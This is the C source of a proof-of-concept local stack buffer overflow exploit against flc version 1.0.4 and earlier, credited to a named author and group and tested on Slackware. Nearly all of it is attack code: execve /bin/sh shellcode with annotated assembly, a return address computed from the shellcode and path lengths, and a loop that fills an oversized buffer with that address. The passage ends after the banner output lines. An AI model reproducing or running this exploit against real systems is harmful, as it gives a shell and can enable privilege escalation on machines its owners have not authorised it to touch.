/* flc <= 1.0.4 local stack buffer overflow exploit
(Proof of Concept)

Tested in Slackware 10.0

by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <strings.h>

#define BUFFER 25632 + 1

char shellcode[]=
"\x31\xc0" /* xor %eax,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x52" /* push %edx */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */

int main(int argc, char *argv[]) {

char *env[3] = {shellcode, NULL};
char buf[BUFFER], *path;
int *buffer = (int *) (buf);
int i, ret;

if(argc != 2) {
printf(" use: %s <path>\n", argv[0]);
exit(0);
}

path = argv[1];

ret = 0xbffffffa - strlen(shellcode) - strlen(path);

for(i=0; i<=BUFFER; i+=4)
*buffer++ = ret;

printf("\n flc <= 1.0.4 local stack buffer overflow (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");